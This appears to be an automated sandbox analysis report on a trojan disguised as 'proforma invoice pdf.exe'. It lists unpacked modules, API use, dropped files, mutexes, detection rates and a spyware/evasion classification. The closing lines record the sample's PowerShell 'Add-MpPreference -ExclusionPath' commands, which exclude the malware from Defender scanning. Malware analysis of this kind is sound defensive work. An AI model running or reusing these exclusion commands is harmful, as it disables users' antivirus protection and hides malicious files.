Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_0592B4DC	0_2_0592B4DC
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_05929640	0_2_05929640
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_059283BC	0_2_059283BC
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_05920278	0_2_05920278
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_073024E8	0_2_073024E8
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_07304A20	0_2_07304A20
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_0730D6F8	0_2_0730D6F8
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_073024DE	0_2_073024DE
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_0730F270	0_2_0730F270
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_07308270	0_2_07308270
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_0730F260	0_2_0730F260
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_0730D2B0	0_2_0730D2B0
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_073082A0	0_2_073082A0
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_073082F0	0_2_073082F0
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_0730D2C0	0_2_0730D2C0
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_07301E00	0_2_07301E00
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_0730CE73	0_2_0730CE73
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_07301DF1	0_2_07301DF1
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 0_2_0730E998	0_2_0730E998
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_01081940	10_2_01081940
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_01081950	10_2_01081950
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_010811A0	10_2_010811A0
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_01374270	10_2_01374270
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_01374E88	10_2_01374E88
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_01379314	10_2_01379314
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_013745B8	10_2_013745B8
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_0137A780	10_2_0137A780
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_0137A868	10_2_0137A868
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_0137B557	10_2_0137B557
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_0718E598	10_2_0718E598
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_07182C38	10_2_07182C38
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_07189440	10_2_07189440
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_0718CC68	10_2_0718CC68
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_07186090	10_2_07186090
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_0718BF93	10_2_0718BF93
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_071A2478	10_2_071A2478
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_071A5A18	10_2_071A5A18
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Code function: 10_2_071A7983	10_2_071A7983
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 11_2_04853E0C	11_2_04853E0C
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 11_2_04857018	11_2_04857018
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 11_2_04E924E8	11_2_04E924E8
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 11_2_04E924DE	11_2_04E924DE
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 11_2_04E9D6F8	11_2_04E9D6F8
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 11_2_04E982F0	11_2_04E982F0
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 11_2_04E9D2C0	11_2_04E9D2C0
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 11_2_04E9D2B0	11_2_04E9D2B0
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 11_2_04E9F260	11_2_04E9F260
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 11_2_04E9F270	11_2_04E9F270
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 11_2_04E91DF1	11_2_04E91DF1
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 11_2_04E9CE72	11_2_04E9CE72
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 11_2_04E9CE77	11_2_04E9CE77
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 11_2_04E91E00	11_2_04E91E00
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 11_2_04E9E998	11_2_04E9E998
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_00F01958	16_2_00F01958
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_00F01948	16_2_00F01948
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_028D4270	16_2_028D4270
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_028D45B8	16_2_028D45B8
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_028D4E88	16_2_028D4E88
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_028DB121	16_2_028DB121
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_028DB130	16_2_028DB130
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_071CC640	16_2_071CC640
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_071CBD73	16_2_071CBD73
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_071C9348	16_2_071C9348
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_071C62B0	16_2_071C62B0
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_071C2AD8	16_2_071C2AD8
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_071C1898	16_2_071C1898
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_07247590	16_2_07247590
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_07242467	16_2_07242467
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_0724A918	16_2_0724A918
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_07245A18	16_2_07245A18
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Code function: 16_2_071C62A0	16_2_071C62A0
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 17_2_01063E0C	17_2_01063E0C
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 17_2_01067018	17_2_01067018
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 17_2_02EFC570	17_2_02EFC570
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 17_2_02EFA820	17_2_02EFA820
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 17_2_02EFA810	17_2_02EFA810
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 17_2_02F07DF8	17_2_02F07DF8
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 17_2_02F00040	17_2_02F00040
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 17_2_02F00E08	17_2_02F00E08
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 17_2_02F00DFA	17_2_02F00DFA
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 17_2_02F07DEA	17_2_02F07DEA
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 17_2_055540B1	17_2_055540B1
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_01510948	20_2_01510948
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_01510938	20_2_01510938
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_03124270	20_2_03124270
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_0312C0F8	20_2_0312C0F8
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_031245B8	20_2_031245B8
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_0312F488	20_2_0312F488
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_0312B900	20_2_0312B900
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_03124E88	20_2_03124E88
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_0753E538	20_2_0753E538
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_0753CC08	20_2_0753CC08
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_0753C33B	20_2_0753C33B
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_0753ACD8	20_2_0753ACD8
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_07534B50	20_2_07534B50
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_07572478	20_2_07572478
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_07577B10	20_2_07577B10
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_0757AA98	20_2_0757AA98
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 20_2_07575A18	20_2_07575A18
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_013E3E0C	22_2_013E3E0C
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_013E7018	22_2_013E7018
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_072A24E8	22_2_072A24E8
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_072A4A20	22_2_072A4A20
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_072AD6E9	22_2_072AD6E9
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_072AD6F8	22_2_072AD6F8
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_072A55C1	22_2_072A55C1
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_072A24D7	22_2_072A24D7
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_072AF260	22_2_072AF260
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_072AF270	22_2_072AF270
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_072AD2B0	22_2_072AD2B0
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_072A82F0	22_2_072A82F0
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_072AD2C0	22_2_072AD2C0
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_072A80D8	22_2_072A80D8
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_072A9E20	22_2_072A9E20
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_072A1E00	22_2_072A1E00
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_072ACE72	22_2_072ACE72
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_072A1DF1	22_2_072A1DF1
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_072AE988	22_2_072AE988
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 22_2_072AE998	22_2_072AE998
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_02804270	25_2_02804270
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_0280A78C	25_2_0280A78C
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_028045B8	25_2_028045B8
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_02804E88	25_2_02804E88
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_0280BF40	25_2_0280BF40
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_0280E107	25_2_0280E107
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_0280A789	25_2_0280A789
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_0280BE50	25_2_0280BE50
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_04D80250	25_2_04D80250
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_04D80260	25_2_04D80260
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_06A33EB0	25_2_06A33EB0
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_06A3CBB0	25_2_06A3CBB0
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_06A398F0	25_2_06A398F0
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_06AAA7F8	25_2_06AAA7F8
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_06AAE068	25_2_06AAE068
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_06AA6BB8	25_2_06AA6BB8
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_06AABE80	25_2_06AABE80
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_06AA3E70	25_2_06AA3E70
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_06AAFA88	25_2_06AAFA88
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_06E72636	25_2_06E72636
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_06E73450	25_2_06E73450
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_06E7AA88	25_2_06E7AA88
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_06E75A18	25_2_06E75A18
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_06E7C320	25_2_06E7C320
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Code function: 25_2_06E77BE9	25_2_06E77BE9

Source: proforma invoice pdf.exe

Static PE information: invalid certificate

Source: proforma invoice pdf.exe, 00000000.00000002.1478921344.00000000011BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs proforma invoice pdf.exe
Source: proforma invoice pdf.exe, 00000000.00000002.1487795231.000000000A3E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs proforma invoice pdf.exe
Source: proforma invoice pdf.exe, 00000000.00000000.1438115564.0000000000ACC000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameLmIG.exe: vs proforma invoice pdf.exe
Source: proforma invoice pdf.exe, 00000000.00000002.1485785699.00000000072A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs proforma invoice pdf.exe
Source: proforma invoice pdf.exe, 00000000.00000002.1479924222.0000000002E98000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename8b4a5e0e-c87d-4238-a46f-02f5a79ace8c.exe4 vs proforma invoice pdf.exe
Source: proforma invoice pdf.exe, 00000000.00000002.1482009308.0000000004112000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs proforma invoice pdf.exe
Source: proforma invoice pdf.exe, 00000000.00000002.1482009308.0000000003E59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename8b4a5e0e-c87d-4238-a46f-02f5a79ace8c.exe4 vs proforma invoice pdf.exe
Source: proforma invoice pdf.exe, 0000000A.00000002.3903973208.000000000042C000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilename8b4a5e0e-c87d-4238-a46f-02f5a79ace8c.exe4 vs proforma invoice pdf.exe
Source: proforma invoice pdf.exe, 0000000A.00000002.3904624398.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs proforma invoice pdf.exe
Source: proforma invoice pdf.exe	Binary or memory string: OriginalFilenameLmIG.exe: vs proforma invoice pdf.exe

Source: proforma invoice pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: proforma invoice pdf.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wTyVrj.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: bmBOz.exe.10.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, GBaoBHDcMSrduWs3oj.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, GBaoBHDcMSrduWs3oj.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, GQbRhLZrZZosOjvGmq.cs	Security API names: _0020.SetAccessControl
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, GQbRhLZrZZosOjvGmq.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, GQbRhLZrZZosOjvGmq.cs	Security API names: _0020.AddAccessRule
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, GQbRhLZrZZosOjvGmq.cs	Security API names: _0020.SetAccessControl
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, GQbRhLZrZZosOjvGmq.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.proforma invoice pdf.exe.a3e0000.4.raw.unpack, GQbRhLZrZZosOjvGmq.cs	Security API names: _0020.AddAccessRule
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, GBaoBHDcMSrduWs3oj.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.proforma invoice pdf.exe.4122240.1.raw.unpack, GBaoBHDcMSrduWs3oj.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@35/32@5/2

Source: C:\Users\user\Desktop\proforma invoice pdf.exe

File created: C:\Users\user\AppData\Roaming\wTyVrj.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3724:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Mutant created: \Sessions\1\BaseNamedObjects\KPptqaeEuALbkywsmH
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5836:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_03

Source: C:\Users\user\Desktop\proforma invoice pdf.exe

File created: C:\Users\user\AppData\Local\Temp\tmp351C.tmp

Jump to behavior

Source: proforma invoice pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: proforma invoice pdf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\proforma invoice pdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\proforma invoice pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: proforma invoice pdf.exe	Virustotal: Detection: 33%
Source: proforma invoice pdf.exe	ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\proforma invoice pdf.exe

File read: C:\Users\user\Desktop\proforma invoice pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\proforma invoice pdf.exe "C:\Users\user\Desktop\proforma invoice pdf.exe"
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wTyVrj.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
